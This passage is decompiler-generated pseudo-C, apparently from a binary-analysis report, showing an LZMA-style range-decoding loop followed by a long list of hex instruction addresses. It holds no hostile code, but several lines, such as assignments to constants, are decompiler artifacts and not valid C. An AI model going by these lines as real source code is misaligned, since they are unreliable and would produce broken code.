								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                  0x00000000
                                                  0x00406520
                                                  0x00406520
                                                  0x00406524
                                                  0x004065db
                                                  0x004065de
                                                  0x004065ea
                                                  0x004064cb
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00406840
                                                  0x00406840
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x004068b6
                                                  0x004068b6
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x00406891
                                                  0x00406891
                                                  0x00406895
                                                  0x00406a44
                                                  0x00000000
                                                  0x00406a44
                                                  0x004068a1
                                                  0x004068a8
                                                  0x004068b0
                                                  0x004068b3
                                                  0x00000000
                                                  0x004068b3
                                                  0x0040652a
                                                  0x0040652e
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00406a72
                                                  0x00406a76
                                                  0x00406a76
                                                  0x00406534
                                                  0x0040653a
                                                  0x0040653d
                                                  0x00406541
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00406a5a
                                                  0x00406a62
                                                  0x00406a69
                                                  0x00406a6b
                                                  0x00000000
                                                  0x00406a6b
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406582
                                                  0x00406582
                                                  0x00406058
                                                  0x00406058
                                                  0x00406061
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00000000
                                                  0x00406072
                                                  0x00000000
                                                  0x00000000
                                                  0x0040607b
                                                  0x0040607e
                                                  0x00406081
                                                  0x00406085
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608b
                                                  0x0040608e
                                                  0x00406090
                                                  0x00406091
                                                  0x00406094
                                                  0x00406096
                                                  0x00406097
                                                  0x00406099
                                                  0x0040609c
                                                  0x004060a1
                                                  0x004060a6
                                                  0x004060af
                                                  0x004060c2
                                                  0x004060c5
                                                  0x004060d1
                                                  0x004060f9
                                                  0x004060fb
                                                  0x00406109
                                                  0x00406109
                                                  0x0040610d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060fd
                                                  0x00406100
                                                  0x00406101
                                                  0x00406101
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060d7
                                                  0x004060dc
                                                  0x004060dc
                                                  0x004060e5
                                                  0x004060ed
                                                  0x004060f0
                                                  0x00000000
                                                  0x004060f6
                                                  0x004060f6
                                                  0x00000000
                                                  0x004060f6
                                                  0x00000000
                                                  0x00406113
                                                  0x00406113
                                                  0x00406117
                                                  0x004069c3
                                                  0x00000000
                                                  0x004069c3
                                                  0x00406120
                                                  0x00406130
                                                  0x00406133
                                                  0x00406136
                                                  0x00406136
                                                  0x00406136
                                                  0x00406139
                                                  0x0040613d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040613f
                                                  0x00406145
                                                  0x0040616f
                                                  0x00406175
                                                  0x0040617c
                                                  0x00000000
                                                  0x0040617c
                                                  0x0040614b
                                                  0x0040614e
                                                  0x00406153
                                                  0x00406153
                                                  0x0040615e
                                                  0x00406166
                                                  0x00406169
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ae
                                                  0x004061b4
                                                  0x004061b7
                                                  0x004061c4
                                                  0x004061cc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406183
                                                  0x00406183
                                                  0x00406187
                                                  0x004069d2
                                                  0x00000000
                                                  0x004069d2
                                                  0x00406193
                                                  0x0040619e
                                                  0x0040619e
                                                  0x0040619e
                                                  0x004061a1
                                                  0x004061a4
                                                  0x004061a7
                                                  0x004061ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061d4
                                                  0x004061d6
                                                  0x004061d9
                                                  0x0040624a
                                                  0x0040624d
                                                  0x00406250
                                                  0x00406257
                                                  0x00406261
                                                  0x00000000
                                                  0x00406261
                                                  0x004061db
                                                  0x004061df
                                                  0x004061e2
                                                  0x004061e4
                                                  0x004061e7
                                                  0x004061ea
                                                  0x004061ec
                                                  0x004061ef
                                                  0x004061f1
                                                  0x004061f6
                                                  0x004061f9
                                                  0x004061fc
                                                  0x00406200
                                                  0x00406207
                                                  0x0040620a
                                                  0x00406211
                                                  0x00406215
                                                  0x0040621d
                                                  0x0040621d
                                                  0x0040621d
                                                  0x00406217
                                                  0x00406217
                                                  0x00406217
                                                  0x0040620c
                                                  0x0040620c
                                                  0x0040620c
                                                  0x00406221
                                                  0x00406224
                                                  0x00406242
                                                  0x00406244
                                                  0x00000000
                                                  0x00406226
                                                  0x00406226
                                                  0x00406229
                                                  0x0040622c
                                                  0x0040622f
                                                  0x00406231
                                                  0x00406231
                                                  0x00406231
                                                  0x00406234
                                                  0x00406237
                                                  0x00406239
                                                  0x0040623a
                                                  0x0040623d
                                                  0x00000000
                                                  0x0040623d
                                                  0x00000000
                                                  0x00406473
                                                  0x00406477
                                                  0x00406495
                                                  0x00406498
                                                  0x0040649f
                                                  0x004064a2
                                                  0x004064a5
                                                  0x004064a8
                                                  0x004064ab
                                                  0x004064ae
                                                  0x004064b0
                                                  0x004064b7
                                                  0x004064b8
                                                  0x004064ba
                                                  0x004064bd
                                                  0x004064c0
                                                  0x004064c3
                                                  0x004064c3
                                                  0x004064c8
                                                  0x00000000
                                                  0x004064c8
                                                  0x00406479
                                                  0x0040647c
                                                  0x0040647f
                                                  0x00406489
                                                  0x00000000
                                                  0x00000000
                                                  0x004064dd
                                                  0x004064e1
                                                  0x00406504
                                                  0x00406507
                                                  0x0040650a
                                                  0x00406514
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064e6
                                                  0x004064e9
                                                  0x004064ec
                                                  0x004064f9
                                                  0x004064fc
                                                  0x004064fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406591
                                                  0x00406595
                                                  0x0040659c
                                                  0x0040659f
                                                  0x004065a2
                                                  0x004065ac
                                                  0x00000000
                                                  0x004065ac
                                                  0x00406597
                                                  0x00000000
                                                  0x00000000
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065c3
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065be
                                                  0x004065be
                                                  0x004065be
                                                  0x004065cc
                                                  0x004065cf
                                                  0x004065d2
                                                  0x004065d2
                                                  0x004065d5
                                                  0x004065d8
                                                  0x00000000
                                                  0x00000000
                                                  0x00406678
                                                  0x00406678
                                                  0x0040667c
                                                  0x00406a1a
                                                  0x00000000
                                                  0x00406a1a
                                                  0x00406682
                                                  0x00406685
                                                  0x00406688
                                                  0x0040668c
                                                  0x0040668f
                                                  0x00406695
                                                  0x00406697
                                                  0x00406697
                                                  0x00406697
                                                  0x0040669a
                                                  0x0040669d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040626d
                                                  0x0040626d
                                                  0x00406271
                                                  0x004069de
                                                  0x00000000
                                                  0x004069de
                                                  0x00406277
                                                  0x0040627a
                                                  0x0040627d
                                                  0x00406281
                                                  0x00406284
                                                  0x0040628a
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406292
                                                  0x00406295
                                                  0x00406298
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x00000000
                                                  0x00000000
                                                  0x004062aa
                                                  0x004062aa
                                                  0x004062ae
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062b7
                                                  0x004062ba
                                                  0x004062bb
                                                  0x004062be
                                                  0x004062c0
                                                  0x004062c6
                                                  0x004062c9
                                                  0x004062cc
                                                  0x004062cf
                                                  0x004062d2
                                                  0x004062d5
                                                  0x004062d8
                                                  0x004062f4
                                                  0x004062f7
                                                  0x004062fa
                                                  0x004062fd
                                                  0x00406304
                                                  0x00406308
                                                  0x0040630a
                                                  0x0040630e
                                                  0x004062da
                                                  0x004062da
                                                  0x004062de
                                                  0x004062e6
                                                  0x004062eb
                                                  0x004062ed
                                                  0x004062ef
                                                  0x004062ef
                                                  0x00406311
                                                  0x00406318
                                                  0x0040631b
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406326
                                                  0x00406326
                                                  0x0040632a
                                                  0x004069ea
                                                  0x00000000
                                                  0x004069ea
                                                  0x00406330
                                                  0x00406333
                                                  0x00406336
                                                  0x0040633a
                                                  0x0040633d
                                                  0x00406343
                                                  0x00406345
                                                  0x00406345
                                                  0x00406345
                                                  0x00406348
                                                  0x0040634b
                                                  0x0040634b
                                                  0x0040634b
                                                  0x00406351
                                                  0x00000000
                                                  0x00000000
                                                  0x00406353
                                                  0x00406356
                                                  0x00406359
                                                  0x0040635c
                                                  0x0040635f
                                                  0x00406362
                                                  0x00406365
                                                  0x00406368
                                                  0x0040636b
                                                  0x0040636e
                                                  0x00406371
                                                  0x00406389
                                                  0x0040638c
                                                  0x0040638f
                                                  0x00406392
                                                  0x00406392
                                                  0x00406395
                                                  0x00406399
                                                  0x0040639b
                                                  0x00406373
                                                  0x00406373
                                                  0x0040637b
                                                  0x00406380
                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x0040639e
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00000000
                                                  0x004063aa
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x00000000
                                                  0x00000000
                                                  0x004063ea
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x0040640f
                                                  0x0040640f
                                                  0x00406415
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x00000000
                                                  0x004063b6
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406432
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645d
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406462
                                                  0x00406469
                                                  0x0040646c
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680e
                                                  0x00406830
                                                  0x00406833
                                                  0x0040683d
                                                  0x00000000
                                                  0x0040683d
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00000000
                                                  0x004068fe
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069bb
                                                  0x00000000
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00406609
                                                  0x0040660c
                                                  0x0040660f
                                                  0x00406611
                                                  0x00406613
                                                  0x00406613
                                                  0x00406614
                                                  0x00406617
                                                  0x0040661e
                                                  0x00406621
                                                  0x0040662f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406914
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00000000
                                                  0x00406a50
                                                  0x0040691e
                                                  0x00406921
                                                  0x00406924
                                                  0x00406928
                                                  0x0040692b
                                                  0x00406931
                                                  0x00406933
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x0040693c
                                                  0x0040693c
                                                  0x00406940
                                                  0x004069a0
                                                  0x004069a3
                                                  0x004069a8
                                                  0x004069a9
                                                  0x004069ab
                                                  0x004069ad
                                                  0x004069b0
                                                  0x00000000
